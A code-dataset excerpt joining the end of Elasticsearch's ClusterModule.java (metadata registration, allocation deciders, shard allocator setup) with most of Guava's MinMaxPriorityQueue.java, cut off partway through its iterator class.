registerMetadataCustom(entries, ScriptMetadata.TYPE, ScriptMetadata::new, ScriptMetadata::readDiffFrom);
registerMetadataCustom(entries, IndexGraveyard.TYPE, IndexGraveyard::new, IndexGraveyard::readDiffFrom);
registerMetadataCustom(
entries,
PersistentTasksCustomMetadata.TYPE,
PersistentTasksCustomMetadata::new,
PersistentTasksCustomMetadata::readDiffFrom
);
registerMetadataCustom(
entries,
ComponentTemplateMetadata.TYPE,
ComponentTemplateMetadata::new,
ComponentTemplateMetadata::readDiffFrom
);
registerMetadataCustom(
entries,
ComposableIndexTemplateMetadata.TYPE,
ComposableIndexTemplateMetadata::new,
ComposableIndexTemplateMetadata::readDiffFrom
);
registerMetadataCustom(entries, DataStreamMetadata.TYPE, DataStreamMetadata::new, DataStreamMetadata::readDiffFrom);
registerMetadataCustom(entries, NodesShutdownMetadata.TYPE, NodesShutdownMetadata::new, NodesShutdownMetadata::readDiffFrom);
registerMetadataCustom(entries, FeatureMigrationResults.TYPE, FeatureMigrationResults::new, FeatureMigrationResults::readDiffFrom);
registerMetadataCustom(entries, DesiredNodesMetadata.TYPE, DesiredNodesMetadata::new, DesiredNodesMetadata::readDiffFrom);
// Task Status (not Diffable)
entries.add(new Entry(Task.Status.class, PersistentTasksNodeService.Status.NAME, PersistentTasksNodeService.Status::new));
// Health API
entries.addAll(HealthNodeTaskExecutor.getNamedWriteables());
entries.addAll(HealthMetadataService.getNamedWriteables());
return entries;
}
public static List<NamedXContentRegistry.Entry> getNamedXWriteables() {
List<NamedXContentRegistry.Entry> entries = new ArrayList<>();
// Metadata
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(RepositoriesMetadata.TYPE),
RepositoriesMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(Metadata.Custom.class, new ParseField(IngestMetadata.TYPE), IngestMetadata::fromXContent)
);
entries.add(
new NamedXContentRegistry.Entry(Metadata.Custom.class, new ParseField(ScriptMetadata.TYPE), ScriptMetadata::fromXContent)
);
entries.add(
new NamedXContentRegistry.Entry(Metadata.Custom.class, new ParseField(IndexGraveyard.TYPE), IndexGraveyard::fromXContent)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(PersistentTasksCustomMetadata.TYPE),
PersistentTasksCustomMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(ComponentTemplateMetadata.TYPE),
ComponentTemplateMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(ComposableIndexTemplateMetadata.TYPE),
ComposableIndexTemplateMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(DataStreamMetadata.TYPE),
DataStreamMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(NodesShutdownMetadata.TYPE),
NodesShutdownMetadata::fromXContent
)
);
entries.add(
new NamedXContentRegistry.Entry(
Metadata.Custom.class,
new ParseField(DesiredNodesMetadata.TYPE),
DesiredNodesMetadata::fromXContent
)
);
return entries;
}
private static <T extends ClusterState.Custom> void registerClusterCustom(
List<Entry> entries,
String name,
Reader<? extends T> reader,
Reader<NamedDiff<?>> diffReader
) {
registerCustom(entries, ClusterState.Custom.class, name, reader, diffReader);
}
private static <T extends Metadata.Custom> void registerMetadataCustom(
List<Entry> entries,
String name,
Reader<? extends T> reader,
Reader<NamedDiff<?>> diffReader
) {
registerCustom(entries, Metadata.Custom.class, name, reader, diffReader);
}
private static <T extends NamedWriteable> void registerCustom(
List<Entry> entries,
Class<T> category,
String name,
Reader<? extends T> reader,
Reader<NamedDiff<?>> diffReader
) {
entries.add(new Entry(category, name, reader));
entries.add(new Entry(NamedDiff.class, name, diffReader));
}
public IndexNameExpressionResolver getIndexNameExpressionResolver() {
return indexNameExpressionResolver;
}
// TODO: this is public so allocation benchmark can access the default deciders...can we do that in another way?
/** Return a new {@link AllocationDecider} instance with builtin deciders as well as those from plugins. */
public static Collection<AllocationDecider> createAllocationDeciders(
Settings settings,
ClusterSettings clusterSettings,
List<ClusterPlugin> clusterPlugins
) {
// collect deciders by class so that we can detect duplicates
Map<Class<?>, AllocationDecider> deciders = new LinkedHashMap<>();
addAllocationDecider(deciders, new MaxRetryAllocationDecider());
addAllocationDecider(deciders, new ResizeAllocationDecider());
addAllocationDecider(deciders, new ReplicaAfterPrimaryActiveAllocationDecider());
addAllocationDecider(deciders, new RebalanceOnlyWhenActiveAllocationDecider());
addAllocationDecider(deciders, new ClusterRebalanceAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new ConcurrentRebalanceAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new EnableAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new NodeVersionAllocationDecider());
addAllocationDecider(deciders, new SnapshotInProgressAllocationDecider());
addAllocationDecider(deciders, new RestoreInProgressAllocationDecider());
addAllocationDecider(deciders, new NodeShutdownAllocationDecider());
addAllocationDecider(deciders, new NodeReplacementAllocationDecider());
addAllocationDecider(deciders, new FilterAllocationDecider(settings, clusterSettings));
addAllocationDecider(deciders, new SameShardAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new DiskThresholdDecider(settings, clusterSettings));
addAllocationDecider(deciders, new ThrottlingAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new ShardsLimitAllocationDecider(clusterSettings));
addAllocationDecider(deciders, new AwarenessAllocationDecider(settings, clusterSettings));
clusterPlugins.stream()
.flatMap(p -> p.createAllocationDeciders(settings, clusterSettings).stream())
.forEach(d -> addAllocationDecider(deciders, d));
return deciders.values();
}
/** Add the given allocation decider to the given deciders collection, erroring if the class name is already used. */
private static void addAllocationDecider(Map<Class<?>, AllocationDecider> deciders, AllocationDecider decider) {
if (deciders.put(decider.getClass(), decider) != null) {
throw new IllegalArgumentException("Cannot specify allocation decider [" + decider.getClass().getName() + "] twice");
}
}
@UpdateForV9 // in v9 there is only one allocator
private static ShardsAllocator createShardsAllocator(
Settings settings,
ClusterSettings clusterSettings,
ThreadPool threadPool,
List<ClusterPlugin> clusterPlugins,
ClusterService clusterService,
DesiredBalanceReconcilerAction reconciler,
WriteLoadForecaster writeLoadForecaster,
TelemetryProvider telemetryProvider
) {
Map<String, Supplier<ShardsAllocator>> allocators = new HashMap<>();
allocators.put(BALANCED_ALLOCATOR, () -> new BalancedShardsAllocator(clusterSettings, writeLoadForecaster));
allocators.put(
DESIRED_BALANCE_ALLOCATOR,
() -> new DesiredBalanceShardsAllocator(
clusterSettings,
new BalancedShardsAllocator(clusterSettings, writeLoadForecaster),
threadPool,
clusterService,
reconciler,
telemetryProvider
)
);
for (ClusterPlugin plugin : clusterPlugins) {
// noinspection removal
plugin.getShardsAllocators(settings, clusterSettings).forEach((k, v) -> {
if (allocators.put(k, v) != null) {
throw new IllegalArgumentException("ShardsAllocator [" + k + "] already defined");
}
});
}
String allocatorName = SHARDS_ALLOCATOR_TYPE_SETTING.get(settings);
Supplier<ShardsAllocator> allocatorSupplier = allocators.get(allocatorName);
if (allocatorSupplier == null) {
throw new IllegalArgumentException("Unknown ShardsAllocator [" + allocatorName + "]");
}
return Objects.requireNonNull(allocatorSupplier.get(), "ShardsAllocator factory for [" + allocatorName + "] returned null");
}
public AllocationService getAllocationService() {
return allocationService;
}
@Override
protected void configure() {
bind(GatewayAllocator.class).asEagerSingleton();
bind(AllocationService.class).toInstance(allocationService);
bind(ClusterService.class).toInstance(clusterService);
bind(NodeConnectionsService.class).asEagerSingleton();
bind(MetadataDeleteIndexService.class).toInstance(metadataDeleteIndexService);
bind(MetadataIndexStateService.class).asEagerSingleton();
bind(MetadataMappingService.class).asEagerSingleton();
bind(MetadataIndexAliasesService.class).asEagerSingleton();
bind(MetadataIndexTemplateService.class).asEagerSingleton();
bind(IndexNameExpressionResolver.class).toInstance(indexNameExpressionResolver);
bind(DelayedAllocationService.class).asEagerSingleton();
bind(ShardStateAction.class).asEagerSingleton();
bind(MappingUpdatedAction.class).asEagerSingleton();
bind(TaskResultsService.class).asEagerSingleton();
bind(AllocationDeciders.class).toInstance(allocationDeciders);
bind(ShardsAllocator.class).toInstance(shardsAllocator);
bind(ShardRoutingRoleStrategy.class).toInstance(shardRoutingRoleStrategy);
bind(AllocationStatsService.class).toInstance(allocationStatsService);
bind(TelemetryProvider.class).toInstance(telemetryProvider);
bind(MetadataRolloverService.class).asEagerSingleton();
}
public void setExistingShardsAllocators(GatewayAllocator gatewayAllocator) {
final Map<String, ExistingShardsAllocator> existingShardsAllocators = new HashMap<>();
existingShardsAllocators.put(GatewayAllocator.ALLOCATOR_NAME, gatewayAllocator);
for (ClusterPlugin clusterPlugin : clusterPlugins) {
for (Map.Entry<String, ExistingShardsAllocator> existingShardsAllocatorEntry : clusterPlugin.getExistingShardsAllocators()
.entrySet()) {
final String allocatorName = existingShardsAllocatorEntry.getKey();
if (existingShardsAllocators.put(allocatorName, existingShardsAllocatorEntry.getValue()) != null) {
throw new IllegalArgumentException(
"ExistingShardsAllocator ["
+ allocatorName
+ "] from ["
+ clusterPlugin.getClass().getName()
+ "] was already defined"
);
}
}
}
allocationService.setExistingShardsAllocators(existingShardsAllocators);
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/cluster/ClusterModule.java |
1,163 | /*
* Copyright (C) 2010 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.base.Preconditions.checkPositionIndex;
import static com.google.common.base.Preconditions.checkState;
import static com.google.common.collect.CollectPreconditions.checkRemove;
import static java.util.Objects.requireNonNull;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.J2ktIncompatible;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.math.IntMath;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import com.google.j2objc.annotations.Weak;
import com.google.j2objc.annotations.WeakOuter;
import java.util.AbstractQueue;
import java.util.ArrayDeque;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.Comparator;
import java.util.ConcurrentModificationException;
import java.util.Iterator;
import java.util.List;
import java.util.NoSuchElementException;
import java.util.PriorityQueue;
import java.util.Queue;
import javax.annotation.CheckForNull;
import org.checkerframework.checker.nullness.qual.Nullable;
/**
* A double-ended priority queue, which provides constant-time access to both its least element and
* its greatest element, as determined by the queue's specified comparator. If no comparator is
* given at creation time, the natural order of elements is used. If no maximum size is given at
* creation time, the queue is unbounded.
*
* <p>Usage example:
*
* <pre>{@code
* MinMaxPriorityQueue<User> users = MinMaxPriorityQueue.orderedBy(userComparator)
* .maximumSize(1000)
* .create();
* }</pre>
*
* <p>As a {@link Queue} it functions exactly as a {@link PriorityQueue}: its head element -- the
* implicit target of the methods {@link #peek()}, {@link #poll()} and {@link #remove()} -- is
* defined as the <i>least</i> element in the queue according to the queue's comparator. But unlike
* a regular priority queue, the methods {@link #peekLast}, {@link #pollLast} and {@link
* #removeLast} are also provided, to act on the <i>greatest</i> element in the queue instead.
*
* <p>A min-max priority queue can be configured with a maximum size. If so, each time the size of
* the queue exceeds that value, the queue automatically removes its greatest element according to
* its comparator (which might be the element that was just added). This is different from
* conventional bounded queues, which either block or reject new elements when full.
*
* <p>This implementation is based on the <a
* href="http://portal.acm.org/citation.cfm?id=6621">min-max heap</a> developed by Atkinson, et al.
* Unlike many other double-ended priority queues, it stores elements in a single array, as compact
* as the traditional heap data structure used in {@link PriorityQueue}.
*
* <p>This class is not thread-safe, and does not accept null elements.
*
* <p><i>Performance notes:</i>
*
* <ul>
* <li>If you only access one end of the queue, and do use a maximum size, this class will perform
* significantly worse than a {@code PriorityQueue} with manual eviction above the maximum
* size. In many cases {@link Ordering#leastOf} may work for your use case with significantly
* improved (and asymptotically superior) performance.
* <li>The retrieval operations {@link #peek}, {@link #peekFirst}, {@link #peekLast}, {@link
* #element}, and {@link #size} are constant-time.
* <li>The enqueuing and dequeuing operations ({@link #offer}, {@link #add}, and all the forms of
* {@link #poll} and {@link #remove()}) run in {@code O(log n) time}.
* <li>The {@link #remove(Object)} and {@link #contains} operations require linear ({@code O(n)})
* time.
* <li>If you only access one end of the queue, and don't use a maximum size, this class is
* functionally equivalent to {@link PriorityQueue}, but significantly slower.
* </ul>
*
* @author Sverre Sundsdal
* @author Torbjorn Gannholm
* @since 8.0
*/
@GwtCompatible
@ElementTypesAreNonnullByDefault
public final class MinMaxPriorityQueue<E> extends AbstractQueue<E> {
/**
* Creates a new min-max priority queue with default settings: natural order, no maximum size, no
* initial contents, and an initial expected size of 11.
*/
public static <E extends Comparable<E>> MinMaxPriorityQueue<E> create() {
return new Builder<Comparable<E>>(Ordering.natural()).create();
}
/**
* Creates a new min-max priority queue using natural order, no maximum size, and initially
* containing the given elements.
*/
public static <E extends Comparable<E>> MinMaxPriorityQueue<E> create(
Iterable<? extends E> initialContents) {
return new Builder<E>(Ordering.<E>natural()).create(initialContents);
}
/**
* Creates and returns a new builder, configured to build {@code MinMaxPriorityQueue} instances
* that use {@code comparator} to determine the least and greatest elements.
*/
/*
* TODO(cpovirk): Change to Comparator<? super B> to permit Comparator<@Nullable ...> and
* Comparator<SupertypeOfB>? What we have here matches the immutable collections, but those also
* expose a public Builder constructor that accepts "? super." So maybe we should do *that*
* instead.
*/
public static <B> Builder<B> orderedBy(Comparator<B> comparator) {
return new Builder<>(comparator);
}
/**
* Creates and returns a new builder, configured to build {@code MinMaxPriorityQueue} instances
* sized appropriately to hold {@code expectedSize} elements.
*/
@SuppressWarnings("rawtypes") // https://github.com/google/guava/issues/989
public static Builder<Comparable> expectedSize(int expectedSize) {
return new Builder<Comparable>(Ordering.natural()).expectedSize(expectedSize);
}
/**
* Creates and returns a new builder, configured to build {@code MinMaxPriorityQueue} instances
* that are limited to {@code maximumSize} elements. Each time a queue grows beyond this bound, it
* immediately removes its greatest element (according to its comparator), which might be the
* element that was just added.
*/
@SuppressWarnings("rawtypes") // https://github.com/google/guava/issues/989
public static Builder<Comparable> maximumSize(int maximumSize) {
return new Builder<Comparable>(Ordering.natural()).maximumSize(maximumSize);
}
/**
* The builder class used in creation of min-max priority queues. Instead of constructing one
* directly, use {@link MinMaxPriorityQueue#orderedBy(Comparator)}, {@link
* MinMaxPriorityQueue#expectedSize(int)} or {@link MinMaxPriorityQueue#maximumSize(int)}.
*
* @param <B> the upper bound on the eventual type that can be produced by this builder (for
* example, a {@code Builder<Number>} can produce a {@code Queue<Number>} or {@code
* Queue<Integer>} but not a {@code Queue<Object>}).
* @since 8.0
*/
public static final class Builder<B> {
/*
* TODO(kevinb): when the dust settles, see if we still need this or can
* just default to DEFAULT_CAPACITY.
*/
private static final int UNSET_EXPECTED_SIZE = -1;
private final Comparator<B> comparator;
private int expectedSize = UNSET_EXPECTED_SIZE;
private int maximumSize = Integer.MAX_VALUE;
private Builder(Comparator<B> comparator) {
this.comparator = checkNotNull(comparator);
}
/**
* Configures this builder to build min-max priority queues with an initial expected size of
* {@code expectedSize}.
*/
@CanIgnoreReturnValue
public Builder<B> expectedSize(int expectedSize) {
checkArgument(expectedSize >= 0);
this.expectedSize = expectedSize;
return this;
}
/**
* Configures this builder to build {@code MinMaxPriorityQueue} instances that are limited to
* {@code maximumSize} elements. Each time a queue grows beyond this bound, it immediately
* removes its greatest element (according to its comparator), which might be the element that
* was just added.
*/
@CanIgnoreReturnValue
public Builder<B> maximumSize(int maximumSize) {
checkArgument(maximumSize > 0);
this.maximumSize = maximumSize;
return this;
}
/**
* Builds a new min-max priority queue using the previously specified options, and having no
* initial contents.
*/
public <T extends B> MinMaxPriorityQueue<T> create() {
return create(Collections.<T>emptySet());
}
/**
* Builds a new min-max priority queue using the previously specified options, and having the
* given initial elements.
*/
public <T extends B> MinMaxPriorityQueue<T> create(Iterable<? extends T> initialContents) {
MinMaxPriorityQueue<T> queue =
new MinMaxPriorityQueue<>(
this, initialQueueSize(expectedSize, maximumSize, initialContents));
for (T element : initialContents) {
queue.offer(element);
}
return queue;
}
@SuppressWarnings("unchecked") // safe "contravariant cast"
private <T extends B> Ordering<T> ordering() {
return Ordering.from((Comparator<T>) comparator);
}
}
private final Heap minHeap;
private final Heap maxHeap;
@VisibleForTesting final int maximumSize;
private @Nullable Object[] queue;
private int size;
private int modCount;
private MinMaxPriorityQueue(Builder<? super E> builder, int queueSize) {
Ordering<E> ordering = builder.ordering();
this.minHeap = new Heap(ordering);
this.maxHeap = new Heap(ordering.reverse());
minHeap.otherHeap = maxHeap;
maxHeap.otherHeap = minHeap;
this.maximumSize = builder.maximumSize;
// TODO(kevinb): pad?
this.queue = new Object[queueSize];
}
@Override
public int size() {
return size;
}
/**
* Adds the given element to this queue. If this queue has a maximum size, after adding {@code
* element} the queue will automatically evict its greatest element (according to its comparator),
* which may be {@code element} itself.
*
* @return {@code true} always
*/
@CanIgnoreReturnValue
@Override
public boolean add(E element) {
offer(element);
return true;
}
@CanIgnoreReturnValue
@Override
public boolean addAll(Collection<? extends E> newElements) {
boolean modified = false;
for (E element : newElements) {
offer(element);
modified = true;
}
return modified;
}
/**
* Adds the given element to this queue. If this queue has a maximum size, after adding {@code
* element} the queue will automatically evict its greatest element (according to its comparator),
* which may be {@code element} itself.
*/
@CanIgnoreReturnValue
@Override
public boolean offer(E element) {
checkNotNull(element);
modCount++;
int insertIndex = size++;
growIfNeeded();
// Adds the element to the end of the heap and bubbles it up to the correct
// position.
heapForIndex(insertIndex).bubbleUp(insertIndex, element);
return size <= maximumSize || pollLast() != element;
}
@CanIgnoreReturnValue
@Override
@CheckForNull
public E poll() {
return isEmpty() ? null : removeAndGet(0);
}
@SuppressWarnings("unchecked") // we must carefully only allow Es to get in
E elementData(int index) {
/*
* requireNonNull is safe as long as we're careful to call this method only with populated
* indexes.
*/
return (E) requireNonNull(queue[index]);
}
@Override
@CheckForNull
public E peek() {
return isEmpty() ? null : elementData(0);
}
/** Returns the index of the max element. */
private int getMaxElementIndex() {
switch (size) {
case 1:
return 0; // The lone element in the queue is the maximum.
case 2:
return 1; // The lone element in the maxHeap is the maximum.
default:
// The max element must sit on the first level of the maxHeap. It is
// actually the *lesser* of the two from the maxHeap's perspective.
return (maxHeap.compareElements(1, 2) <= 0) ? 1 : 2;
}
}
/**
* Removes and returns the least element of this queue, or returns {@code null} if the queue is
* empty.
*/
@CanIgnoreReturnValue
@CheckForNull
public E pollFirst() {
return poll();
}
/**
* Removes and returns the least element of this queue.
*
* @throws NoSuchElementException if the queue is empty
*/
@CanIgnoreReturnValue
public E removeFirst() {
return remove();
}
/**
* Retrieves, but does not remove, the least element of this queue, or returns {@code null} if the
* queue is empty.
*/
@CheckForNull
public E peekFirst() {
return peek();
}
/**
* Removes and returns the greatest element of this queue, or returns {@code null} if the queue is
* empty.
*/
@CanIgnoreReturnValue
@CheckForNull
public E pollLast() {
return isEmpty() ? null : removeAndGet(getMaxElementIndex());
}
/**
* Removes and returns the greatest element of this queue.
*
* @throws NoSuchElementException if the queue is empty
*/
@CanIgnoreReturnValue
public E removeLast() {
if (isEmpty()) {
throw new NoSuchElementException();
}
return removeAndGet(getMaxElementIndex());
}
/**
* Retrieves, but does not remove, the greatest element of this queue, or returns {@code null} if
* the queue is empty.
*/
@CheckForNull
public E peekLast() {
return isEmpty() ? null : elementData(getMaxElementIndex());
}
/**
* Removes the element at position {@code index}.
*
* <p>Normally this method leaves the elements at up to {@code index - 1}, inclusive, untouched.
* Under these circumstances, it returns {@code null}.
*
* <p>Occasionally, in order to maintain the heap invariant, it must swap a later element of the
* list with one before {@code index}. Under these circumstances it returns a pair of elements as
* a {@link MoveDesc}. The first one is the element that was previously at the end of the heap and
* is now at some position before {@code index}. The second element is the one that was swapped
* down to replace the element at {@code index}. This fact is used by iterator.remove so as to
* visit elements during a traversal once and only once.
*/
@VisibleForTesting
@CanIgnoreReturnValue
@CheckForNull
MoveDesc<E> removeAt(int index) {
checkPositionIndex(index, size);
modCount++;
size--;
if (size == index) {
queue[size] = null;
return null;
}
E actualLastElement = elementData(size);
int lastElementAt = heapForIndex(size).swapWithConceptuallyLastElement(actualLastElement);
if (lastElementAt == index) {
// 'actualLastElement' is now at 'lastElementAt', and the element that was at 'lastElementAt'
// is now at the end of queue. If that's the element we wanted to remove in the first place,
// don't try to (incorrectly) trickle it. Instead, just delete it and we're done.
queue[size] = null;
return null;
}
E toTrickle = elementData(size);
queue[size] = null;
MoveDesc<E> changes = fillHole(index, toTrickle);
if (lastElementAt < index) {
// Last element is moved to before index, swapped with trickled element.
if (changes == null) {
// The trickled element is still after index.
return new MoveDesc<>(actualLastElement, toTrickle);
} else {
// The trickled element is back before index, but the replaced element
// has now been moved after index.
return new MoveDesc<>(actualLastElement, changes.replaced);
}
}
// Trickled element was after index to begin with, no adjustment needed.
return changes;
}
@CheckForNull
private MoveDesc<E> fillHole(int index, E toTrickle) {
Heap heap = heapForIndex(index);
// We consider elementData(index) a "hole", and we want to fill it
// with the last element of the heap, toTrickle.
// Since the last element of the heap is from the bottom level, we
// optimistically fill index position with elements from lower levels,
// moving the hole down. In most cases this reduces the number of
// comparisons with toTrickle, but in some cases we will need to bubble it
// all the way up again.
int vacated = heap.fillHoleAt(index);
// Try to see if toTrickle can be bubbled up min levels.
int bubbledTo = heap.bubbleUpAlternatingLevels(vacated, toTrickle);
if (bubbledTo == vacated) {
// Could not bubble toTrickle up min levels, try moving
// it from min level to max level (or max to min level) and bubble up
// there.
return heap.tryCrossOverAndBubbleUp(index, vacated, toTrickle);
} else {
return (bubbledTo < index) ? new MoveDesc<E>(toTrickle, elementData(index)) : null;
}
}
// Returned from removeAt() to iterator.remove()
static class MoveDesc<E> {
final E toTrickle;
final E replaced;
MoveDesc(E toTrickle, E replaced) {
this.toTrickle = toTrickle;
this.replaced = replaced;
}
}
/** Removes and returns the value at {@code index}. */
private E removeAndGet(int index) {
E value = elementData(index);
removeAt(index);
return value;
}
private Heap heapForIndex(int i) {
return isEvenLevel(i) ? minHeap : maxHeap;
}
private static final int EVEN_POWERS_OF_TWO = 0x55555555;
private static final int ODD_POWERS_OF_TWO = 0xaaaaaaaa;
@VisibleForTesting
static boolean isEvenLevel(int index) {
int oneBased = ~~(index + 1); // for GWT
checkState(oneBased > 0, "negative index");
return (oneBased & EVEN_POWERS_OF_TWO) > (oneBased & ODD_POWERS_OF_TWO);
}
/**
* Returns {@code true} if the MinMax heap structure holds. This is only used in testing.
*
* <p>TODO(kevinb): move to the test class?
*/
@VisibleForTesting
boolean isIntact() {
for (int i = 1; i < size; i++) {
if (!heapForIndex(i).verifyIndex(i)) {
return false;
}
}
return true;
}
/**
* Each instance of MinMaxPriorityQueue encapsulates two instances of Heap: a min-heap and a
* max-heap. Conceptually, these might each have their own array for storage, but for efficiency's
* sake they are stored interleaved on alternate heap levels in the same array (MMPQ.queue).
*/
@WeakOuter
class Heap {
final Ordering<E> ordering;
@SuppressWarnings("nullness:initialization.field.uninitialized")
@Weak
Heap otherHeap; // always initialized immediately after construction
Heap(Ordering<E> ordering) {
this.ordering = ordering;
}
int compareElements(int a, int b) {
return ordering.compare(elementData(a), elementData(b));
}
/**
* Tries to move {@code toTrickle} from a min to a max level and bubble up there. If it moved
* before {@code removeIndex} this method returns a pair as described in {@link #removeAt}.
*/
@CheckForNull
MoveDesc<E> tryCrossOverAndBubbleUp(int removeIndex, int vacated, E toTrickle) {
int crossOver = crossOver(vacated, toTrickle);
if (crossOver == vacated) {
return null;
}
// Successfully crossed over from min to max.
// Bubble up max levels.
E parent;
// If toTrickle is moved up to a parent of removeIndex, the parent is
// placed in removeIndex position. We must return that to the iterator so
// that it knows to skip it.
if (crossOver < removeIndex) {
// We crossed over to the parent level in crossOver, so the parent
// has already been moved.
parent = elementData(removeIndex);
} else {
parent = elementData(getParentIndex(removeIndex));
}
// bubble it up the opposite heap
if (otherHeap.bubbleUpAlternatingLevels(crossOver, toTrickle) < removeIndex) {
return new MoveDesc<>(toTrickle, parent);
} else {
return null;
}
}
/** Bubbles a value from {@code index} up the appropriate heap if required. */
void bubbleUp(int index, E x) {
int crossOver = crossOverUp(index, x);
Heap heap;
if (crossOver == index) {
heap = this;
} else {
index = crossOver;
heap = otherHeap;
}
heap.bubbleUpAlternatingLevels(index, x);
}
/**
* Bubbles a value from {@code index} up the levels of this heap, and returns the index the
* element ended up at.
*/
@CanIgnoreReturnValue
int bubbleUpAlternatingLevels(int index, E x) {
while (index > 2) {
int grandParentIndex = getGrandparentIndex(index);
E e = elementData(grandParentIndex);
if (ordering.compare(e, x) <= 0) {
break;
}
queue[index] = e;
index = grandParentIndex;
}
queue[index] = x;
return index;
}
/**
* Returns the index of minimum value between {@code index} and {@code index + len}, or {@code
* -1} if {@code index} is greater than {@code size}.
*/
int findMin(int index, int len) {
if (index >= size) {
return -1;
}
checkState(index > 0);
int limit = Math.min(index, size - len) + len;
int minIndex = index;
for (int i = index + 1; i < limit; i++) {
if (compareElements(i, minIndex) < 0) {
minIndex = i;
}
}
return minIndex;
}
/** Returns the minimum child or {@code -1} if no child exists. */
int findMinChild(int index) {
return findMin(getLeftChildIndex(index), 2);
}
/** Returns the minimum grand child or -1 if no grand child exists. */
int findMinGrandChild(int index) {
int leftChildIndex = getLeftChildIndex(index);
if (leftChildIndex < 0) {
return -1;
}
return findMin(getLeftChildIndex(leftChildIndex), 4);
}
/**
* Moves an element one level up from a min level to a max level (or vice versa). Returns the
* new position of the element.
*/
int crossOverUp(int index, E x) {
if (index == 0) {
queue[0] = x;
return 0;
}
int parentIndex = getParentIndex(index);
E parentElement = elementData(parentIndex);
if (parentIndex != 0) {
/*
* This is a guard for the case of the childless aunt node. Since the end of the array is
* actually the middle of the heap, a smaller childless aunt node can become a child of x
* when we bubble up alternate levels, violating the invariant.
*/
int grandparentIndex = getParentIndex(parentIndex);
int auntIndex = getRightChildIndex(grandparentIndex);
if (auntIndex != parentIndex && getLeftChildIndex(auntIndex) >= size) {
E auntElement = elementData(auntIndex);
if (ordering.compare(auntElement, parentElement) < 0) {
parentIndex = auntIndex;
parentElement = auntElement;
}
}
}
if (ordering.compare(parentElement, x) < 0) {
queue[index] = parentElement;
queue[parentIndex] = x;
return parentIndex;
}
queue[index] = x;
return index;
}
// About the term "aunt node": it's better to leave gender out of it, but for this the English
// language has nothing for us. Except for the whimsical neologism "pibling" (!) which we
// obviously could not expect to increase anyone's understanding of the code.
/**
* Swap {@code actualLastElement} with the conceptually correct last element of the heap.
* Returns the index that {@code actualLastElement} now resides in.
*
* <p>Since the last element of the array is actually in the middle of the sorted structure, a
* childless aunt node could be smaller, which would corrupt the invariant if this element
* becomes the new parent of the aunt node. In that case, we first switch the last element with
* its aunt node, before returning.
*/
int swapWithConceptuallyLastElement(E actualLastElement) {
int parentIndex = getParentIndex(size);
if (parentIndex != 0) {
int grandparentIndex = getParentIndex(parentIndex);
int auntIndex = getRightChildIndex(grandparentIndex);
if (auntIndex != parentIndex && getLeftChildIndex(auntIndex) >= size) {
E auntElement = elementData(auntIndex);
if (ordering.compare(auntElement, actualLastElement) < 0) {
queue[auntIndex] = actualLastElement;
queue[size] = auntElement;
return auntIndex;
}
}
}
return size;
}
/**
* Crosses an element over to the opposite heap by moving it one level down (or up if there are
* no elements below it).
*
* <p>Returns the new position of the element.
*/
int crossOver(int index, E x) {
int minChildIndex = findMinChild(index);
// TODO(kevinb): split the && into two if's and move crossOverUp so it's
// only called when there's no child.
if ((minChildIndex > 0) && (ordering.compare(elementData(minChildIndex), x) < 0)) {
queue[index] = elementData(minChildIndex);
queue[minChildIndex] = x;
return minChildIndex;
}
return crossOverUp(index, x);
}
/**
* Fills the hole at {@code index} by moving in the least of its grandchildren to this position,
* then recursively filling the new hole created.
*
* @return the position of the new hole (where the lowest grandchild moved from, that had no
* grandchild to replace it)
*/
int fillHoleAt(int index) {
int minGrandchildIndex;
while ((minGrandchildIndex = findMinGrandChild(index)) > 0) {
queue[index] = elementData(minGrandchildIndex);
index = minGrandchildIndex;
}
return index;
}
private boolean verifyIndex(int i) {
if ((getLeftChildIndex(i) < size) && (compareElements(i, getLeftChildIndex(i)) > 0)) {
return false;
}
if ((getRightChildIndex(i) < size) && (compareElements(i, getRightChildIndex(i)) > 0)) {
return false;
}
if ((i > 0) && (compareElements(i, getParentIndex(i)) > 0)) {
return false;
}
if ((i > 2) && (compareElements(getGrandparentIndex(i), i) > 0)) {
return false;
}
return true;
}
// These would be static if inner classes could have static members.
private int getLeftChildIndex(int i) {
return i * 2 + 1;
}
private int getRightChildIndex(int i) {
return i * 2 + 2;
}
private int getParentIndex(int i) {
return (i - 1) / 2;
}
private int getGrandparentIndex(int i) {
return getParentIndex(getParentIndex(i)); // (i - 3) / 4
}
}
/**
* Iterates the elements of the queue in no particular order.
*
* <p>If the underlying queue is modified during iteration an exception will be thrown.
*/
private class QueueIterator implements Iterator<E> {
private int cursor = -1;
private int nextCursor = -1;
private int expectedModCount = modCount;
// The same element is not allowed in both forgetMeNot and skipMe, but duplicates are allowed in
// either of them, up to the same multiplicity as the queue.
@CheckForNull private Queue<E> forgetMeNot;
@CheckForNull private List<E> skipMe;
@CheckForNull private E lastFromForgetMeNot;
private boolean canRemove;
@Override
public boolean hasNext() {
checkModCount();
nextNotInSkipMe(cursor + 1);
